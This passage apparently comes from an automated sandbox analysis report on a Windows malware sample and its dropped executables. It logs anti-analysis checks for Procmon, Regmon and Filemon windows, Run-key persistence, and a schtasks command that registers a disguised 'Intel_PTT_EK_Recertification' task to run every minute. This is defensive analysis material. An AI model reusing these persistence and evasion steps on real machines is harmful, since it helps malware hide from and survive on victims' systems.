                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonclassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1018969001\db77c3e215.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeWindow searched: window name: Regmonclass
                          Uses schtasks.exe or at.exe to add and modify task schedules
                          Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7278b2c5ac.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7278b2c5ac.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1742fccc73.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1742fccc73.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adcff63ffe.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run adcff63ffe.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c48ca243d4.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run c48ca243d4.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_000B26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,44_2_000B26DD
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comCode function: 44_2_0003FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,44_2_0003FC7C
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1018967001\f0aeaa9386.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018968001\3dd71a48b2.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\245347\Dry.comProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018970001\4fa7efe79d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1018971001\ea2827841c.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
